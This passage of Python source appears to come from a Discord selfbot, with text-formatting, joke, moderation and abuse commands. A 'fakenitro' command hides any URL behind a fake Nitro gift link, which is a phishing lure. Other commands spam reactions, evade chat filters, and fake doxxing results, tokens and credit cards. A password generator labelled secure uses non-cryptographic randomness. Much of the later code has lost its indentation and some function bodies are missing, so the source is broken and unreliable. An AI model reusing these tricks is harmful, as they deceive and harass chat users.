        e.set_thumbnail(url=__embedimage__)
        e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        e.timestamp = datetime.now()
        await ctx.send(embed=e)
@BetterGhost.command(name="8ball", description="Ask the magic eight ball a question.", usage="8ball [question]", aliases=["eightball", "magic8ball"])
async def eightball(ctx, *, question):
    """Answer *question* with a classic magic-8-ball response."""
    answers = ["As I see it, yes.", "Ask again later.", "Better not tell you now.", "Cannot predict now.", "Concentrate and ask again.", "Don’t count on it.", "It is certain.", "It is decidedly so.", "Most likely.", "My reply is no.", "My sources say no.", "Outlook not so good.", "Outlook good.", "Reply hazy, try again.", "Signs point to yes.", "Very doubtful.", "Without a doubt.", "Yes.", "Yes – definitely.", "You may rely on it."]
    reply = "8ball says, " + random.choice(answers)
    if __embedmode__:
        card = discord.Embed(title=f"{question}", description=reply, color=__embedcolour__)
        card.set_thumbnail(url=__embedimage__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        await ctx.send(question + "\n" + reply)
@BetterGhost.command(name="choice", description="Pick a random choice.", usage="choice [choice1] [choice2]", aliases=["pick"])
async def choice(ctx, choice1, choice2):
    """Pick one of the two supplied options at random."""
    picked = random.choice([choice1, choice2])
    if __embedmode__:
        card = discord.Embed(title=f"{picked}", color=__embedcolour__)
        card.set_thumbnail(url=__embedimage__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        await ctx.send(picked)
# @BetterGhost.command(name="wyr", description="Would you rather questions.", usage="wyr")
# async def wyr_(ctx):
# question, _ = wyr()
# embed = discord.Embed(title="Would You Rather", description=question, color=__embedcolour__)
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(embed=embed)
# # await message.add_reaction("\U0001F7E6")
# # await message.add_reaction("\U0001F7E5")
@BetterGhost.command(name="dox", description="Dox the mentioned user.", usage="dox [@user]")
async def dox(ctx, *, user: discord.User):
    """Joke command: fabricate a random "dox" (IP, country, OS) for *user*."""
    # Four random octets for the fake IP address.
    randint1 = random.randint(100, 270)
    randint2 = random.randint(100, 270)
    randint3 = random.randint(10, 40)
    randint4 = random.randint(100, 270)
    # Pool of country names to pick from at random.
    countries = ["Afghanistan","Albania","Algeria","Andorra","Angola","Anguilla","Argentina","Armenia","Aruba","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bermuda","Bhutan","Bolivia","Bosnia & Herzegovina","Botswana","Brazil","British Virgin Islands","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Cape Verde","Cayman Islands","Chad","Chile","China","Colombia","Congo","Cook Islands","Costa Rica","Cote D Ivoire","Croatia","Cruise Ship","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","Ecuador","Egypt","El Salvador","Equatorial Guinea","Estonia","Ethiopia","Falkland Islands","Faroe Islands","Fiji","Finland","France","French Polynesia","French West Indies","Gabon","Gambia","Georgia","Germany","Ghana","Gibraltar","Greece","Greenland","Grenada","Guam","Guatemala","Guernsey","Guinea","Guinea Bissau","Guyana","Haiti","Honduras","Hong Kong","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Isle of Man","Israel","Italy","Jamaica","Japan","Jersey","Jordan","Kazakhstan","Kenya","Kuwait","Kyrgyz Republic","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macau","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Mauritania","Mauritius","Mexico","Moldova","Monaco","Mongolia","Montenegro","Montserrat","Morocco","Mozambique","Namibia","Nepal","Netherlands","Netherlands Antilles","New Caledonia","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palestine","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Puerto Rico","Qatar","Reunion","Romania","Russia","Rwanda","Saint Pierre & Miquelon","Samoa","San Marino","Saudi Arabia","Senegal","Serbia","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","South Africa","South Korea","Spain","Sri Lanka","St Kitts & Nevis","St Lucia","St Vincent","St. Lucia","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Timor L'Este","Togo","Tonga","Trinidad & Tobago","Tunisia","Turkey","Turkmenistan","Turks & Caicos","Uganda","Ukraine","United Arab Emirates","United Kingdom","Uruguay","Uzbekistan","Venezuela","Vietnam","Virgin Islands (US)","Yemen","Zambia","Zimbabwe"]
    # Possible "operating systems" for the fake report.
    computer = ['Windows', 'Mac', 'Linux', 'IOS', 'Android', 'Unknown']
    if __embedmode__:
        embed = discord.Embed(title=f"Doxxed {user.name}", color=__embedcolour__)
        embed.add_field(name="IP Address", value=f"```{randint1}.{randint2}.{randint3}.{randint4}```")
        embed.add_field(name="Country", value="```" + random.choice(countries) + "```")
        embed.add_field(name="Computer", value="```" + random.choice(computer) + "```")
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed)
    else:
        await ctx.send(f"Doxxed {user.name}\nIP Address: {randint1}.{randint2}.{randint3}.{randint4}\nCountry: " + random.choice(countries) + "\nComputer: " + random.choice(computer))
@BetterGhost.command(name="fakenitro", description="Hide a link in a nitro URL.", usage="fakenitro [url]")
async def fakenitro(ctx, *, url):
    """Send an embed whose fake nitro-gift link actually points at *url*."""
    alphabet = string.ascii_letters + string.digits
    code = "".join(random.choice(alphabet) for _ in range(16))
    nitro = f"https://discord.gift/{code}"
    if __embedmode__:
        card = discord.Embed(title=f"Nitro", color=__embedcolour__, description=f"[{nitro}]({url})")
        card.set_thumbnail(url=__embedimage__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        # Markdown masked links only work inside embeds.
        await ctx.send("This command can only be used in embed mode.")
@BetterGhost.command(name="nitrogen", description="Generate a nitro code.", usage="nitrogen", aliases=["nitrogenerate", "generatenitro", "gennitro"])
async def nitrogen(ctx):
    """Generate and send a random (almost certainly invalid) nitro gift link."""
    alphabet = string.ascii_letters + string.digits
    code = "".join(random.choice(alphabet) for _ in range(19))
    nitro = f"https://discord.gift/{code}"
    if __embedmode__:
        card = discord.Embed(title=f"Nitro", color=__embedcolour__, description=f"{nitro}")
        card.set_thumbnail(url=__embedimage__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        await ctx.send(nitro)
@BetterGhost.command(name="tokengen", description="Generate a discord user token.", usage="tokengen", aliases=["generatetoken", "tokengenerate", "gentoken"])
async def tokengen(ctx):
    """Build a realistic-looking (fake) token: base64 of the author's id plus random parts."""
    alphabet = string.ascii_letters + string.digits
    # First segment mimics a real token: the user id, base64-encoded.
    first = base64.b64encode(str(ctx.author.id).encode('ascii')).decode('ascii')
    middle = "".join(random.choice(alphabet) for _ in range(6))
    last = "".join(random.choice(alphabet) for _ in range(27))
    token = f"{first}.{middle}.{last}"
    if __embedmode__:
        card = discord.Embed(title=f"Token Generator", color=__embedcolour__, description=f"{token}")
        card.set_thumbnail(url=__embedimage__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        await ctx.send(token)
@BetterGhost.command(name="identitygen", description="Generate a fake identity.", usage="identitygen", aliases=["identitygenerate", "generateidentity", "genidentity"])
async def identitygen(ctx):
firstname = fake.first_name()
lastname = fake.last_name()
address = fake.address()
job = fake.job()
phone = fake.phone_number()
emails = ["gmail.com", "yahoo.com", "yahoo.co.uk"]
emailchoice = random.choice(emails)
email = f"{firstname}.{lastname}@{emailchoice}"
birthdate = fake.date_of_birth()
genderchoices = ["Male", "Female"]
gender = random.choice(genderchoices)
if __embedmode__:
embed = discord.Embed(title=f"Identity Generator", color=__embedcolour__)
embed.add_field(name="Full Name", value=f"{firstname} {lastname}", inline=True)
embed.add_field(name="Email", value=f"{email}", inline=True)
embed.add_field(name="Phone Number", value=f"{phone}", inline=True)
embed.add_field(name="Occupation", value=f"{job}", inline=True)
embed.add_field(name="Birthdate", value=f"{birthdate}", inline=True)
embed.add_field(name="Gender", value=f"{gender}", inline=True)
embed.add_field(name="Address", value=f"{address}", inline=True)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Identity Generator ]
Full Name: {firstname} {lastname}
Email: {email}
Phone Number: {phone}
Occupation: {job}
Birthdate: {birthdate}
Gender: {gender}
Address: {address}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="passwordgen", description="Generate a secure password.", usage="passwordgen [length]", aliases=["passwordgenerate", "generatepassword", "genpassword"])
async def passwordgen(ctx, length: int):
password = ''.join(random.choice(string.ascii_letters) for i in range(length))
if __embedmode__:
embed = discord.Embed(title="Password Generator", color=__embedcolour__, description=f"Your generated password is ||{password}||")
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"Password: ||{password}||")
@BetterGhost.command(name="ccgen", description="Generate a fake Credit card.", usage="ccgen", aliases=["creditcardgenerate", "creditcardgen", "generatecc", "ccgenerate", "gencreditcard", "generatecreditcard"])
async def ccgen(ctx):
name = names.get_full_name()
address = fake.address()
cvv = random.randint(100, 999)
expiremonth = random.randint(1, 12)
expireyear = now.year + random.randint(1, 4)
choices = [4,5,6]
choice = random.choice(choices)
if choice == 4:
type = "Visa"
typeimg = "https://ghost.cool/assets/visa.png"
elif choice == 5:
type = "Mastercard"
typeimg = "https://ghost.cool/assets/mastercard.png"
elif choice == 6:
type = "Discover"
typeimg = "https://ghost.cool/assets/discover.png"
string1 = random.randint(100, 999)
string2 = random.randint(1000, 9999)
string3 = random.randint(1000, 9999)
string4 = random.randint(1000, 9999)
if __embedmode__:
embed = discord.Embed(title="Credit Card Generator", color=__embedcolour__)
embed.add_field(name="Number", value=f"{choice}{string1} {string2} {string3} {string4}", inline=True)
embed.add_field(name="Name", value=f"{name}", inline=True)
embed.add_field(name="CVV", value=f"{cvv}", inline=True)
embed.add_field(name="Expire Date", value=f"{expiremonth}/{expireyear}", inline=True)
embed.add_field(name="Type", value=f"{type}", inline=True)
embed.add_field(name="Address", value=f"{address}", inline=True)
embed.set_thumbnail(url=typeimg)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Credit Card Generator ]
Number: {choice}{string1} {string2} {string3} {string4}
Name: {name}
CVV: {cvv}
Expire Date: {expiremonth}/{expireyear}
Type: {type}
Address: {address}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="cembed", description="Create a custom embedded message.", usage='cembed [title] [description] [colour]', aliases=["customembed"])
async def cembed(ctx, title, description, colour):
if __embedmode__:
colour = int(colour.replace('#', '0x'), 0)
embed = discord.Embed(title=title, description=description, color=colour)
await ctx.send(embed=embed)
else:
await ctx.send("This command can only be used in embed mode.")
@BetterGhost.command(name="embed", description="Create an embedded message.", usage="embed [title]")
async def embed(ctx, *, title):
if __embedmode__:
embed = discord.Embed(title=title, color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command can only be used in embed mode.")
@BetterGhost.command(name="leet", description="Turn your text into 1337 text.", usage="leet [text]", aliases=["1337", "leetspeak"])
async def leet(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/leet?text={text}").text)
@BetterGhost.command(name="zalgo", description="Unleash the zalgo into your message.", usage="zalgo [text]")
async def zalgo(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/zalgo?text={text}").text)
@BetterGhost.command(name="upsidedown", description="Flip your text upsidedown.", usage="upsidedown [text]")
async def upsidedown(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/upsidedown?text={text}").text)
@BetterGhost.command(name="reverse", description="Reverse your text making them look backwards.", usage="reverse [text]", aliases=["backwards"])
async def reverse(ctx, *, text):
await ctx.send(''.join(list(reversed(text))))
@BetterGhost.command(name="ascii", description="Send your message in ascii.", usage="ascii [text]")
async def ascii(ctx, *, text):
message = text
art = requests.get(f'http://artii.herokuapp.com/make?text={urllib.parse.quote_plus(message)}+&font=standard').text
await ctx.send(f"```{art}```")
@BetterGhost.command(name="privatemsg", description="Send an encrypted message.", usage="privatemsg [message]", aliases=["b64encode", "privatemessage"])
async def privatemsg(ctx, *, message):
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
await ctx.send(base64_message)
@BetterGhost.command(name="privatemsgdecode", description="Decode an encrypted message.", usage="privatemsgdecode [message]", aliases=["b64decode", "privatemessagedecode"])
async def privatemsgdecode(ctx, *, message):
base64_message = message
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
await ctx.send(message)
@BetterGhost.command(name="encodebinary", description="Encode a message in binary.", usage="encodebinary [message]", aliases=["binaryencode", "binary"])
async def encodebinary(ctx, *, message):
translation = ""
@BetterGhost.command(name="decodebinary", description="Decode a message in binary.", usage="decodebinary [message]", aliases=["binarydecode", "unbinary"])
async def decodebinary(ctx, *, message):
translation = ""
@BetterGhost.command(name="encodemorse", description="Encode a message in morsecode", usage="encodemorse [message]", aliases=["morseencode", "morse"])
async def encodemorse(ctx, *, message):
text = message.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/encodemorse?text={text}").text)
@BetterGhost.command(name="decodemorse", description="Decode a message in morsecode", usage="decodemorse [message]", aliases=["morsedecode", "unmorse"])
async def decodemorse(ctx, *, message):
text = message.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/decodemorse?text={text}").text)
@BetterGhost.command(name="secret", description="Send all your messages in a secret block.", usage="secret [message]")
async def secret(ctx, *, message):
await ctx.send('||' + message + '||')
@BetterGhost.command(name="secretletters", description="Put all lettes from your message into separate secret blocks", usage="secretletters [message]")
async def secretletters(ctx, *, message):
def split(word):
return list(word)
msg = ""
for letter in split(message):
msg += "||" + letter + "||"
await ctx.send(msg)
@BetterGhost.command(name="bold", description="Send all your messages in bold.", usage="bold [message]")
async def bold(ctx, *, message):
await ctx.send('**' + message + '**')
@BetterGhost.command(name="italic", description="Send all your messages in italics.", usage="italic [message]")
async def italic(ctx, *, message):
await ctx.send('*' + message + '*')
@BetterGhost.command(name="cpp", description="Send all your messages in a C++ code block.", usage="cpp [message]")
async def cpp(ctx, *, message):
await ctx.send(f"""```cpp\n{message}```""")
@BetterGhost.command(name="cs", description="Send all your messages in a C Sharp code block.", usage="cs [message]")
async def cs(ctx, *, message):
await ctx.send(f"""```cs\n{message}```""")
@BetterGhost.command(name="java", description="Send all your messages in a Java code block.", usage="java [message]")
async def java(ctx, *, message):
await ctx.send(f"""```java\n{message}```""")
@BetterGhost.command(name="python", description="Send all your messages in a Python code block.", usage="python [message]")
async def python(ctx, *, message):
await ctx.send(f"""```py\n{message}```""")
@BetterGhost.command(name="js", description="Send all your messages in a JavaScript code block.", usage="js [message]")
async def js(ctx, *, message):
await ctx.send(f"""```js\n{message}```""")
@BetterGhost.command(name="lua", description="Send all your messages in a Lua code block.", usage="lua [message]")
async def lua(ctx, *, message):
await ctx.send(f"""```lua\n{message}```""")
@BetterGhost.command(name="php", description="Send all your messages in a PHP code block.", usage="php [message]")
async def php(ctx, *, message):
await ctx.send(f"""```php\n{message}```""")
@BetterGhost.command(name="html", description="Send all your messages in a HTML code block.", usage="html [message]")
async def html(ctx, *, message):
await ctx.send(f"""```html\n{message}```""")
@BetterGhost.command(name="css", description="Send all your messages in a CSS code block.", usage="css [message]")
async def css(ctx, *, message):
await ctx.send(f"""```css\n{message}```""")
@BetterGhost.command(name="yaml", description="Send all your messages in a YAML code block.", usage="yaml [message]")
async def yaml(ctx, *, message):
await ctx.send(f"""```yaml\n{message}```""")
@BetterGhost.command(name="json", description="Send all your messages in a JSON code block.", usage="json [message]")
async def _json(ctx, *, message):
await ctx.send(f"""```json\n{message}```""")
@BetterGhost.command(name="aesthetic", description="Send your text s p a c e d out.", usage="aesthetic [text]")
async def aesthetic(ctx, *, text):
message = text
msg = ""
for letter in list(message):
msg += " " + letter + " "
await ctx.send(msg)
@BetterGhost.command(name="animate", description="Animate your text.", usage="animate [text]")
async def animate(ctx, *, text):
output = ""
text = list(text)
msg = await ctx.send(text[0])
for letter in text:
output = output + letter + ""
await msg.edit(content=output)
await asyncio.sleep(1)
@BetterGhost.command(name="chatbypass", description="Bypass chat language restrictions.", usage="chatbypass [text]", aliases=["bypasschat"])
async def chatbypass(ctx, *, text):
text = text.lower()
regional_indicators = {
'a': '𝚊',
'b': '𝚋',
'c': '𝚌',
'd': '𝚍',
'e': '𝚎',
'f': '𝚏',
'g': '𝚐',
'h': '𝚑',
'i': '𝚒',
'j': '𝚓',
'k': '𝚔',
'l': '𝚕',
'm': '𝚖',
'n': '𝚗',
'o': '𝚘',
'p': '𝚙',
'q': '𝚚',
'r': '𝚛',
's': '𝚜',
't': '𝚝',
'u': '𝚞',
'v': '𝚟',
'w': '𝚠',
'x': '𝚡',
'y': '𝚢',
'z': '𝚣'
}
output = ""
text = list(text)
for letter in text:
if letter in regional_indicators:
output = output + regional_indicators[letter] + ""
else:
output = output + letter
await ctx.send(output)
@BetterGhost.command(name="regional", description="Replace all letters with emoji.", usage="regional [text]")
async def regional(ctx, *, text):
text = text.lower()
regional_indicators = {
'a': '<:regional_indicator_a:803940414524620800>',
'b': '<:regional_indicator_b:803940414524620800>',
'c': '<:regional_indicator_c:803940414524620800>',
'd': '<:regional_indicator_d:803940414524620800>',
'e': '<:regional_indicator_e:803940414524620800>',
'f': '<:regional_indicator_f:803940414524620800>',
'g': '<:regional_indicator_g:803940414524620800>',
'h': '<:regional_indicator_h:803940414524620800>',
'i': '<:regional_indicator_i:803940414524620800>',
'j': '<:regional_indicator_j:803940414524620800>',
'k': '<:regional_indicator_k:803940414524620800>',
'l': '<:regional_indicator_l:803940414524620800>',
'm': '<:regional_indicator_m:803940414524620800>',
'n': '<:regional_indicator_n:803940414524620800>',
'o': '<:regional_indicator_o:803940414524620800>',
'p': '<:regional_indicator_p:803940414524620800>',
'q': '<:regional_indicator_q:803940414524620800>',
'r': '<:regional_indicator_r:803940414524620800>',
's': '<:regional_indicator_s:803940414524620800>',
't': '<:regional_indicator_t:803940414524620800>',
'u': '<:regional_indicator_u:803940414524620800>',
'v': '<:regional_indicator_v:803940414524620800>',
'w': '<:regional_indicator_w:803940414524620800>',
'x': '<:regional_indicator_x:803940414524620800>',
'y': '<:regional_indicator_y:803940414524620800>',
'z': '<:regional_indicator_z:803940414524620800>'
}
output = ""
text = list(text)
for letter in text:
if letter in regional_indicators:
output = output + regional_indicators[letter] + " "
else:
output = output + letter
await ctx.send(output)
@BetterGhost.command(name="reactspam", description="Spam reactions on X amount of messages.", usage="reactspam [emoji] [messages]", aliases=["spamreactions", "spamreact"])
async def reactspam(ctx, emoji, messages: int):
if __riskmode__:
#channel = BetterGhost.get_channel(ctx.channel.id)
msgs = await ctx.channel.history(limit=messages).flatten()
for msg in msgs:
try:
await msg.add_reaction(emoji)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="uppercase", description="Send your message in uppercase.", usage="uppercase [msg]")
async def uppercase(ctx, *, msg):
string = msg.upper()
await ctx.send(string)
@BetterGhost.command(name="lowercase", description="Send your message in lowercase.", usage="lowercase [msg]")
async def lowercase(ctx, *, msg):
string = msg.lower()
await ctx.send(string)
@BetterGhost.command(name="sentencecase", description="Send your messages in sentence case.", usage="sentencecase [msg]")
async def sentencecase(ctx, *, msg):
sentenceList = msg.split(". ")
sentenceList2 = []
for string in sentenceList:
string = string[:1].upper() + string[1:]
sentenceList2.append(string)
sentence = ". ".join(sentenceList2)
await ctx.send(sentence)
@BetterGhost.command(name="banlist", description="See the server's ban list.", usage="banlist")
async def banlist(ctx):
if ctx.author.guild_permissions.manage_guild:
msg = ""
banlist = await ctx.guild.bans()
for ban in banlist:
#username = user[0].name
msg += f"{ban.user.name}#{ban.user.discriminator} ({ban.user.id})\n"
if __embedmode__:
embed = discord.Embed(title=ctx.guild.name + "'s banned member list", description=msg, color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {ctx.guild.name}'s banned member list ]
{msg}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="ban", description="Ban the mentioned user.", usage="ban [@user]")
async def ban(ctx, *, user: discord.Member):
if ctx.author.guild_permissions.ban_members:
await user.ban()
if __embedmode__:
embed = discord.Embed(title=user.name + " has been banned", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been banned")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="unban", description="Unban the mentioned id.", usage="unban [id]")
async def unban(ctx, *, id: int):
if ctx.author.guild_permissions.ban_members:
user = await BetterGhost.fetch_user(id)
await ctx.guild.unban(user)
if __embedmode__:
embed = discord.Embed(title=user.name + " has been unbanned", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been unbanned")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="kick", description="Kick the mentioned user.", usage="kick [@user]")
async def kick(ctx, user: discord.Member):
if ctx.author.guild_permissions.kick_members:
await user.kick()
if __embedmode__:
embed = discord.Embed(title=user.name + " has been kicked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been kicked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="mute", description="Mute the menitioned user.", usage="mute [@user]")
async def mute(ctx, user: discord.Member):
if ctx.author.guild_permissions.mute_members:
if get(ctx.guild.roles, name="Muted"):
mutedrole = get(ctx.guild.roles, name="Muted")
else:
await ctx.guild.create_role(name="Muted")
mutedrole = get(ctx.guild.roles, name="Muted")
for channel in ctx.guild.channels:
if channel.type == "Text":
await channel.set_permissions(mutedrole, send_messages=False)
else:
await channel.set_permissions(mutedrole, send_messages=False, connect=False)
await user.add_roles(mutedrole)
if __embedmode__:
embed = discord.Embed(title=user.name + " has been muted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been muted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="unmute", description="Unmute the mentioned user.", usage="unmute [@user]")
async def unmute(ctx, user: discord.Member):
if ctx.author.guild_permissions.mute_members:
mutedrole = get(ctx.guild.roles, name="Muted")
if mutedrole in user.roles:
if __embedmode__:
await user.remove_roles(mutedrole)
embed = discord.Embed(title=user.name + " has been unmuted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been unmuted")
else:
if __embedmode__:
embed = discord.Embed(title=user.name + " is not muted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} is not muted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="newrole", description="Create a new role.", usage="newrole [name]", aliases=["createrole"])
async def newrole(ctx, *, name):
if ctx.author.guild_permissions.manage_roles:
await ctx.guild.create_role(name=name)
if __embedmode__:
embed = discord.Embed(title="@" + name + " has been created", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"@{name} has been created")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="delrole", description="Delete the mentioned role.", usage="delrole [@role]", aliases=["deleterole"])
async def delrole(ctx, *, role: discord.Role):
if ctx.author.guild_permissions.manage_roles:
await role.delete()
if __embedmode__:
embed = discord.Embed(title="@" + role.name + " has been deleted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"@{role.name} has been deleted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="purge", description="Purge X amount of messages.", usage="purge [amount]")
async def purge(ctx, amount: int):
if ctx.author.guild_permissions.manage_messages:
history = await ctx.channel.history(limit=amount).flatten()
deletedamount = 0
for message in history:
try:
deletedamount+=1
await message.delete()
await asyncio.sleep(1)
except:
pass
if __embedmode__:
embed = discord.Embed(title=f"Deleted {deletedamount} messages", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Deleted {deletedamount} messages")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
